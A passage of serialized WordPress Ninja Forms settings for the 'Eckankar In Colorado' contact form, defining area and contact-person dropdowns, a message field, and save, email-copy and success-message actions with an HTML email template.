href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_122\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_122\";}s:2:\"id\";i:113;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:4:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"Initiator-Joan Riester\";s:5:\"value\";s:22:\"Initiator-Joan Riester\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:5:\"value\";s:37:\"ESA/Initiator-Bonnie Alexander-Reeves\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:25:\"ESA/Initiator-Jane Taylor\";s:5:\"value\";s:25:\"ESA-Initiator-Jane Taylor\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166439207\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_125\";}s:2:\"id\";i:116;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_126\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_126\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:117;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801551902\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"643\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_128\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_128\";}s:2:\"id\";i:119;}i:10;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663801548990\";}s:2:\"id\";s:3:\"644\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:03\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:41;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:03\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_120}\";s:13:\"email_subject\";s:42:\"Colorado Springs Initiators and ESAâs\";s:13:\"email_message\";s:3763:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_118},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado Springs Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:42;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:03\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from 